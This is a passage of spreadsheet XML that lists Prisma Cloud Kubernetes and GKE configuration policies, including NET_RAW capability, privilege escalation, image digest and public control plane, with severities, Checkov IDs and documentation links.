        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1226" s="2" t="inlineStr"/>
      <c r="D1226" t="inlineStr"/>
      <c r="E1226" t="inlineStr"/>
      <c r="F1226" t="inlineStr"/>
      <c r="G1226" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1226" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1226" t="inlineStr">
        <is>
          <t>Admission of containers with NET_RAW capability is not minimized</t>
        </is>
      </c>
      <c r="L1226" t="inlineStr"/>
      <c r="M1226" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1226" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1226" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1226" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1226" t="inlineStr"/>
      <c r="R1226" t="inlineStr"/>
      <c r="S1226" t="inlineStr"/>
      <c r="T1226" t="b">
        <v>0</v>
      </c>
      <c r="U1226" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1226" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1226" t="inlineStr">
        <is>
          <t>Minimize the admission of containers with the NET_RAW capability</t>
        </is>
      </c>
      <c r="X1226" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-27</t>
        </is>
      </c>
      <c r="Y1226" t="inlineStr"/>
      <c r="Z1226" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1226" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1226" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1226" t="inlineStr">
        <is>
          <t>CKV_K8S_28</t>
        </is>
      </c>
      <c r="AD1226" t="b">
        <v>1</v>
      </c>
      <c r="AE1226" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1226" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>fca26197-9f75-4188-9a4f-c16f6903479d</t>
        </is>
      </c>
      <c r="AI1226" t="inlineStr"/>
      <c r="AJ1226" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1226" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" t="inlineStr"/>
      <c r="B1227" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1227" s="2" t="inlineStr"/>
      <c r="D1227" t="inlineStr"/>
      <c r="E1227" t="inlineStr"/>
      <c r="F1227" t="inlineStr"/>
      <c r="G1227" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1227" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1227" t="inlineStr">
        <is>
          <t>Containers run with AllowPrivilegeEscalation</t>
        </is>
      </c>
      <c r="L1227" t="inlineStr"/>
      <c r="M1227" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1227" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1227" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1227" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1227" t="inlineStr"/>
      <c r="R1227" t="inlineStr"/>
      <c r="S1227" t="inlineStr"/>
      <c r="T1227" t="b">
        <v>0</v>
      </c>
      <c r="U1227" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1227" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1227" t="inlineStr">
        <is>
          <t>Containers should not run with allowPrivilegeEscalation</t>
        </is>
      </c>
      <c r="X1227" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-19</t>
        </is>
      </c>
      <c r="Y1227" t="inlineStr"/>
      <c r="Z1227" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1227" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1227" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1227" t="inlineStr">
        <is>
          <t>CKV_K8S_20</t>
        </is>
      </c>
      <c r="AD1227" t="b">
        <v>1</v>
      </c>
      <c r="AE1227" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1227" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>3aa8f043-3853-4c9e-ae3a-8d3a70d69d4b</t>
        </is>
      </c>
      <c r="AI1227" t="inlineStr"/>
      <c r="AJ1227" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1227" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" t="inlineStr"/>
      <c r="B1228" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1228" s="2" t="inlineStr"/>
      <c r="D1228" t="inlineStr"/>
      <c r="E1228" t="inlineStr"/>
      <c r="F1228" t="inlineStr"/>
      <c r="G1228" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1228" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1228" t="inlineStr">
        <is>
          <t>Image pull policy is not set to Always</t>
        </is>
      </c>
      <c r="L1228" t="inlineStr"/>
      <c r="M1228" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1228" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1228" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1228" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1228" t="inlineStr"/>
      <c r="R1228" t="inlineStr"/>
      <c r="S1228" t="inlineStr"/>
      <c r="T1228" t="b">
        <v>0</v>
      </c>
      <c r="U1228" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1228" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1228" t="inlineStr">
        <is>
          <t>Image Pull Policy should be Always</t>
        </is>
      </c>
      <c r="X1228" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-14</t>
        </is>
      </c>
      <c r="Y1228" t="inlineStr"/>
      <c r="Z1228" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1228" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1228" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1228" t="inlineStr">
        <is>
          <t>CKV_K8S_15</t>
        </is>
      </c>
      <c r="AD1228" t="b">
        <v>1</v>
      </c>
      <c r="AE1228" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1228" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>a2eea53c-a666-4616-b19d-d08c0261b622</t>
        </is>
      </c>
      <c r="AI1228" t="inlineStr"/>
      <c r="AJ1228" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1228" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" t="inlineStr"/>
      <c r="B1229" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1229" s="2" t="inlineStr"/>
      <c r="D1229" t="inlineStr"/>
      <c r="E1229" t="inlineStr"/>
      <c r="F1229" t="inlineStr"/>
      <c r="G1229" t="b">
        <v>1</v>
      </c>
      <c r="H12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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1229" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1229" t="inlineStr">
        <is>
          <t>Admission of containers with capabilities assigned is not limited</t>
        </is>
      </c>
      <c r="L1229" t="inlineStr"/>
      <c r="M1229" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1229" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1229" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1229" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1229" t="inlineStr"/>
      <c r="R1229" t="inlineStr"/>
      <c r="S1229" t="inlineStr"/>
      <c r="T1229" t="b">
        <v>0</v>
      </c>
      <c r="U1229" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1229" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1229" t="inlineStr">
        <is>
          <t>Minimize the admission of containers with capabilities assigned</t>
        </is>
      </c>
      <c r="X1229" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-34</t>
        </is>
      </c>
      <c r="Y1229" t="inlineStr"/>
      <c r="Z1229" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1229" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1229" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1229" t="inlineStr">
        <is>
          <t>CKV_K8S_37</t>
        </is>
      </c>
      <c r="AD1229" t="b">
        <v>1</v>
      </c>
      <c r="AE1229" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1229" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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29" t="inlineStr">
        <is>
          <t>7d672908-064b-4d17-af1d-bea9d94ebf3f</t>
        </is>
      </c>
      <c r="AI1229" t="inlineStr"/>
      <c r="AJ1229" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1229" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" t="inlineStr"/>
      <c r="B1230" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1230" s="2" t="inlineStr"/>
      <c r="D1230" t="inlineStr"/>
      <c r="E1230" t="inlineStr"/>
      <c r="F1230" t="inlineStr"/>
      <c r="G1230" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1230" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="K1230" t="inlineStr">
        <is>
          <t>Images are not selected using a digest</t>
        </is>
      </c>
      <c r="L1230" t="inlineStr"/>
      <c r="M1230" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1230" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1230" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1230" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1230" t="inlineStr"/>
      <c r="R1230" t="inlineStr"/>
      <c r="S1230" t="inlineStr"/>
      <c r="T1230" t="b">
        <v>0</v>
      </c>
      <c r="U1230" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1230" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers,initContainers</t>
        </is>
      </c>
      <c r="W1230" t="inlineStr">
        <is>
          <t>Image should use digest</t>
        </is>
      </c>
      <c r="X1230" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-39</t>
        </is>
      </c>
      <c r="Y1230" t="inlineStr"/>
      <c r="Z1230" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers","initContainers"]}</t>
        </is>
      </c>
      <c r="AA1230" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1230" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1230" t="inlineStr">
        <is>
          <t>CKV_K8S_43</t>
        </is>
      </c>
      <c r="AD1230" t="b">
        <v>1</v>
      </c>
      <c r="AE1230" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1230" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>77c34141-aca8-4c26-8d6c-f894b8c51c71</t>
        </is>
      </c>
      <c r="AI1230" t="inlineStr"/>
      <c r="AJ1230" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1230" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" t="inlineStr"/>
      <c r="B1231" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1231" s="2" t="inlineStr"/>
      <c r="D1231" t="inlineStr"/>
      <c r="E1231" t="inlineStr"/>
      <c r="F1231" t="inlineStr"/>
      <c r="G1231" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1231" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container</t>
        </is>
      </c>
      <c r="K1231" t="inlineStr">
        <is>
          <t>GCP Kubernetes engine clusters have client certificate disabled</t>
        </is>
      </c>
      <c r="L1231" t="inlineStr"/>
      <c r="M1231" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1231" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1231" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1231" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1231" t="inlineStr"/>
      <c r="R1231" t="inlineStr"/>
      <c r="S1231" t="inlineStr"/>
      <c r="T1231" t="b">
        <v>0</v>
      </c>
      <c r="U1231" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1231" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container-cluster</t>
        </is>
      </c>
      <c r="W1231" t="inlineStr">
        <is>
          <t>Ensure a client certificate is used by clients to authenticate to Kubernetes Engine Clusters</t>
        </is>
      </c>
      <c r="X1231" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-8</t>
        </is>
      </c>
      <c r="Y1231" t="inlineStr"/>
      <c r="Z1231" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA1231" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1231" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1231" t="inlineStr">
        <is>
          <t>CKV_GCP_13</t>
        </is>
      </c>
      <c r="AD1231" t="b">
        <v>1</v>
      </c>
      <c r="AE1231" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1231" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>4b071d02-1ade-4935-a166-fd5ba04ae198</t>
        </is>
      </c>
      <c r="AI1231" t="inlineStr"/>
      <c r="AJ1231" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1231" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" t="inlineStr"/>
      <c r="B1232" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1232" s="2" t="inlineStr"/>
      <c r="D1232" t="inlineStr"/>
      <c r="E1232" t="inlineStr"/>
      <c r="F1232" t="inlineStr"/>
      <c r="G1232" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1232" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container</t>
        </is>
      </c>
      <c r="K1232" t="inlineStr">
        <is>
          <t>GKE NodePool configuration managed at cluster level</t>
        </is>
      </c>
      <c r="L1232" t="inlineStr"/>
      <c r="M1232" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1232" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1232" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1232" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1232" t="inlineStr"/>
      <c r="R1232" t="inlineStr"/>
      <c r="S1232" t="inlineStr"/>
      <c r="T1232" t="b">
        <v>0</v>
      </c>
      <c r="U1232" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1232" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container-cluster</t>
        </is>
      </c>
      <c r="W1232" t="inlineStr">
        <is>
          <t>Ensure GKE doesn't use NodePools in the cluster configuration</t>
        </is>
      </c>
      <c r="X1232" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-google-cloud-123</t>
        </is>
      </c>
      <c r="Y1232" t="inlineStr"/>
      <c r="Z1232" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA1232" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1232" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1232" t="inlineStr">
        <is>
          <t>CKV_GCP_123</t>
        </is>
      </c>
      <c r="AD1232" t="b">
        <v>1</v>
      </c>
      <c r="AE1232" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1232" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>7d82bdac-74df-4719-9cfd-16ae0946c6ca</t>
        </is>
      </c>
      <c r="AI1232" t="inlineStr"/>
      <c r="AJ1232" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1232" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" t="inlineStr"/>
      <c r="B1233" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1233" s="2" t="inlineStr"/>
      <c r="D1233" t="inlineStr"/>
      <c r="E1233" t="inlineStr"/>
      <c r="F1233" t="inlineStr"/>
      <c r="G1233" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1233" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container</t>
        </is>
      </c>
      <c r="K1233" t="inlineStr">
        <is>
          <t>GKE control plane is public</t>
        </is>
      </c>
      <c r="L1233" t="inlineStr"/>
      <c r="M1233" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1233" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1233" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1233" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1233" t="inlineStr"/>
      <c r="R1233" t="inlineStr"/>
      <c r="S1233" t="inlineStr"/>
      <c r="T1233" t="b">
        <v>0</v>
      </c>
      <c r="U1233" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1233" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container-cluster</t>
        </is>
      </c>
      <c r="W1233" t="inlineStr">
        <is>
          <t>Ensure GKE Control Plane is not public</t>
        </is>
      </c>
      <c r="X1233" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-10</t>
        </is>
      </c>
      <c r="Y1233" t="inlineStr"/>
      <c r="Z1233" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA1233" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1233" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1233" t="inlineStr">
        <is>
          <t>CKV_GCP_18</t>
        </is>
      </c>
      <c r="AD1233" t="b">
        <v>1</v>
      </c>
      <c r="AE1233" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1233" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>f3d16b54-4fb0-4e19-a797-a257c0078c70</t>
        </is>
      </c>
      <c r="AI1233" t="inlineStr"/>
      <c r="AJ1233" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1233" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" t="inlineStr"/>
      <c r="B1234" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1234" s="2" t="inlineStr"/>
      <c r="D1234" t="inlineStr"/>
      <c r="E1234" t="inlineStr"/>
      <c r="F1234" t="inlineStr"/>
      <c r="G1234" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1234" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container</t>
        </is>
      </c>
      <c r="K1234" t="inlineStr">
        <is>
          <t>Kubernetes RBAC users are not managed with Google Groups for GKE</t>
        </is>
      </c>
      <c r="L1234" t="inlineStr"/>
      <c r="M1234" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1234" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1234" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1234" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1234" t="inlineStr"/>
      <c r="R1234" t="inlineStr"/>
      <c r="S1234" t="inlineStr"/>
      <c r="T1234" t="b">
        <v>0</v>
      </c>
      <c r="U1234" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1234" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container-cluster</t>
        </is>
      </c>
      <c r="W1234" t="inlineStr">
        <is>
          <t>Manage Kubernetes RBAC users with Google Groups for GKE</t>
        </is>
      </c>
      <c r="X1234" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/manage-kubernetes-rbac-users-with-google-groups-for-gke</t>
        </is>
      </c>
      <c r="Y1234" t="inlineStr"/>
      <c r="Z1234" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA1234" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1234" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1234" t="inlineStr">
        <is>
          <t>CKV_GCP_65</t>
        </is>
      </c>
      <c r="AD1234" t="b">
        <v>1</v>
      </c>
      <c r="AE1234" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1234" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>afe5614d-a235-4a73-a885-c312aa5619dd</t>
        </is>
      </c>
      <c r="AI1234" t="inlineStr"/>
      <c r="AJ1234" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1234" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" t="inlineStr"/>
      <c r="B1235" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1235" s="2" t="inlineStr"/>
      <c r="D1235" t="inlineStr"/>
      <c r="E1235" t="inlineStr"/>
      <c r="F1235" t="inlineStr"/>
      <c r="G1235" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1235" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container</t>
        </is>
      </c>
      <c r="K1235" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have pod security policy disabled</t>
        </is>
      </c>
      <c r="L1235" t="inlineStr"/>
      <c r="M1235" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1235" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1235" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1235" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1235" t="inlineStr"/>
      <c r="R1235" t="inlineStr"/>
      <c r="S1235" t="inlineStr"/>
      <c r="T1235" t="b">
        <v>0</v>
      </c>
      <c r="U1235" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1235" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container-cluster</t>
        </is>
      </c>
      <c r="W1235" t="inlineStr">
        <is>
          <t>Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters</t>
        </is>
      </c>
      <c r="X1235" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-9</t>
        </is>
      </c>
      <c r="Y1235" t="inlineStr"/>
      <c r="Z1235" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA1235" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1235" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1235" t="inlineStr">
        <is>
          <t>CKV_GCP_24</t>
        </is>
      </c>
      <c r="AD1235" t="b">
        <v>1</v>
      </c>
      <c r="AE1235" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1235" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>b654ab07-f39a-4a35-9dac-2948a61e03c2</t>
        </is>
      </c>
      <c r="AI1235" t="inlineStr"/>
      <c r="AJ1235" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1235" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" t="inlineStr"/>
      <c r="B1236" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1236" s="2" t="inlineStr"/>
      <c r="D1236" t="inlineStr"/>
      <c r="E1236" t="inlineStr"/>
      <c r="F1236" t="inlineStr"/>
      <c r="G1236" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1236" t="inlineStr">
